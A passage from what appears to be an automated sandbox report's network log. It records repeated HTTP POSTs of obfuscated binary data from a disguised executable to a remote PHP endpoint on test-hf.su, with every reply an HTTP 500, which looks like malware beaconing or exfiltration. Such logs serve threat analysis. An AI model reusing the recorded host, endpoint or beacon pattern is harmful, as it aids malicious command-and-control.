                                                                    Mar 5, 2024 22:28:21.371265888 CET2596OUTData Raw: 54 58 51 5e 5b 5e 55 54 5e 57 5a 51 57 5c 50 58 54 53 54 5d 56 58 57 5e 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: TXQ^[^UT^WZQW\PXTST]VXW^T^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]982R%#Z'X,?!3(;[&54P6??^34?\&<;%Z"!Q*=
                                                                    Mar 5, 2024 22:28:21.609965086 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:21 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    50192.168.2.54977191.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:21.941019058 CET324OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Mar 5, 2024 22:28:22.149682999 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:22.149907112 CET2596OUTData Raw: 51 5c 51 5d 5e 5b 55 52 5e 57 5a 51 57 5e 50 5f 54 51 54 53 56 55 57 58 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: Q\Q]^[UR^WZQW^P_TQTSVUWXT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9E,2005^0,/!'?\&*/#,8"$3$;_%,);%Z"!Q*
                                                                    Mar 5, 2024 22:28:22.384341002 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:22 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    51192.168.2.54977291.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:22.726752043 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:22.937387943 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:22.937720060 CET2596OUTData Raw: 51 5a 51 5d 5e 59 55 54 5e 57 5a 51 57 5e 50 59 54 51 54 5c 56 59 57 5b 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: QZQ]^YUT^WZQW^PYTQT\VYW[T^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9D,W930=[35"_/?-$+%<!?#/3&$$?:;%Z"!Q*
                                                                    Mar 5, 2024 22:28:23.175699949 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:23 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    52192.168.2.54977391.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:23.502744913 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:23.711553097 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:23.711929083 CET2596OUTData Raw: 54 59 54 5b 5e 59 55 54 5e 57 5a 51 57 5d 50 5e 54 52 54 5e 56 5e 57 59 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: TYT[^YUT^WZQW]P^TRT^V^WYT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]:825$"06*/<*]$^0&);!$!/_3772<./%Z"!Q*9
                                                                    Mar 5, 2024 22:28:23.945357084 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:23 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    53192.168.2.54977491.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:24.287301064 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:24.496103048 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:24.496428013 CET2596OUTData Raw: 54 59 51 5a 5b 5f 55 55 5e 57 5a 51 57 5c 50 5e 54 56 54 52 56 59 57 54 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: TYQZ[_UU^WZQW\P^TVTRVYWTT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9C81U'"$%*_;)30%0!$V6??Y&4<$?%,9%Z"!Q*=
                                                                    Mar 5, 2024 22:28:24.732176065 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:24 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    54192.168.2.54977691.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:25.271505117 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 1892
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:25.481096029 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:25.481771946 CET1892OUTData Raw: 51 5e 51 5b 5e 5b 55 57 5e 57 5a 51 57 5f 50 53 54 53 54 5d 56 5c 57 5f 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: Q^Q[^[UW^WZQW_PSTST]V\W_T^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9@,!3&&6\/?'+/X&9+#<;!,(&'+Y28%Z"!Q*1
                                                                    Mar 5, 2024 22:28:25.719048023 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:25 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    55192.168.2.54977791.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:25.392493963 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2592
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:25.601495981 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:25.601810932 CET2592OUTData Raw: 51 59 51 59 5b 5b 55 52 5e 57 5a 51 57 59 50 52 54 51 54 5a 56 58 57 5d 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: QYQY[[UR^WZQWYPRTQTZVXW]T^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]:,009$%"_/0;8&98Q#,+57&$?%?-8)%Z"!Q*
                                                                    Mar 5, 2024 22:28:25.837702990 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:25 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    56192.168.2.54977891.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:26.176038980 CET324OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2592
                                                                    Expect: 100-continue
                                                                    Mar 5, 2024 22:28:26.386712074 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:26.387154102 CET2592OUTData Raw: 51 5a 54 58 5e 5d 50 53 5e 57 5a 51 57 59 50 58 54 5c 54 59 56 5e 57 5a 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: QZTX^]PS^WZQWYPXT\TYV^WZT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9,5$0%'6&8&_'8+[% U"46,^$4%,-,%Z"!Q*%
                                                                    Mar 5, 2024 22:28:26.633552074 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:26 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    57192.168.2.54977991.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:26.973067045 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:27.183384895 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:27.183958054 CET2596OUTData Raw: 54 5d 54 5a 5b 56 55 51 5e 57 5a 51 57 51 50 53 54 53 54 5a 56 5f 57 5c 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: T]TZ[VUQ^WZQWQPSTSTZV_W\T^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9;!S33-/1'8X%;5 Q#<7'8%Z%8)%Z"!Q*
                                                                    Mar 5, 2024 22:28:27.422560930 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:27 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    58192.168.2.54978091.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:27.761527061 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:27.974004984 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:27.974354029 CET2596OUTData Raw: 54 5c 54 5f 5b 5b 50 54 5e 57 5a 51 57 51 50 5f 54 55 54 53 56 55 57 5d 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: T\T_[[PT^WZQWQP_TUTSVUW]T^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]:8"U$3&//>Y3;01#"(V#<#Y3$/X&"[,%Z"!Q*
                                                                    Mar 5, 2024 22:28:28.214462996 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:28 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    59192.168.2.54978191.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:28.555927992 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:28.766170979 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:28.766598940 CET2596OUTData Raw: 51 5e 51 59 5e 5b 50 54 5e 57 5a 51 57 5e 50 5c 54 53 54 58 56 59 57 55 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: Q^QY^[PT^WZQW^P\TSTXVYWUT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9C811%#!Z&56,Y*'^$29?!Z8W#??''41?"\/9%Z"!Q*
                                                                    Mar 5, 2024 22:28:29.004904032 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:28 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    60192.168.2.54978291.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:29.332469940 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:29.543406010 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:29.543677092 CET2596OUTData Raw: 51 5e 54 5a 5e 5b 50 57 5e 57 5a 51 57 51 50 52 54 5d 54 53 56 58 57 54 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: Q^TZ^[PW^WZQWQPRT]TSVXWTT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9D;:R$#23&"Y/?*^'($')?!<;!Z3$#Y%/&Z/%Z"!Q*
                                                                    Mar 5, 2024 22:28:29.781369925 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:29 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    61192.168.2.54978391.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:30.114413977 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:30.324275017 CET25INHTTP/1.1 100 Continue
                                                                    Mar 5, 2024 22:28:30.324718952 CET2596OUTData Raw: 51 5d 54 5c 5b 5e 55 52 5e 57 5a 51 57 5a 50 52 54 5c 54 59 56 5f 57 58 54 5e 5c 5b 57 5c 5a 53 41 59 55 49 5e 5e 56 5b 5f 50 5f 51 5e 5b 5f 5b 56 59 5d 5a 5f 57 5b 5c 5a 5b 52 5b 5a 50 57 5d 58 5e 59 46 53 5e 58 5d 5a 58 5d 58 5b 56 5e 50 5b 5b
                                                                    Data Ascii: Q]T\[^UR^WZQWZPRT\TYV_WXT^\[W\ZSAYUI^^V[_P_Q^[_[VY]Z_W[\Z[R[ZPW]X^YFS^X]ZX]X[V^P[[U]_ZZXV_Y_[WRVT[]V\\B_URAYXT_ZQ_ZWZ[^T__[][U\X\R]YPZ]]\[VT[[\U]_UX[U_[\V]ZTIR^FR[CWRX]T[TYV\YSBSP_BP_]9,1'35]&6),?'(#18T5Z8P!,347^$/2-)%Z"!Q*%
                                                                    Mar 5, 2024 22:28:30.561702013 CET259INHTTP/1.1 500 Internal Server Error
                                                                    Server: nginx/1.14.1
                                                                    Date: Tue, 05 Mar 2024 21:28:30 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 0
                                                                    Connection: keep-alive
                                                                    Keep-Alive: timeout=20
                                                                    X-Powered-By: PHP/7.3.33
                                                                    X-Power-Supply-By: 220 Volt


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    62192.168.2.54978491.227.16.11804980C:\Program Files (x86)\Mozilla Maintenance Service\logs\vVSUwBXtljAfFANPiZBBPFzlgh.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 5, 2024 22:28:30.895553112 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                    Content-Type: application/octet-stream
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29
                                                                    Host: h172956.srv11.test-hf.su
                                                                    Content-Length: 2596
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Mar 5, 2024 22:28:31.107105970 CET25INHTTP/1.1 100 Continue
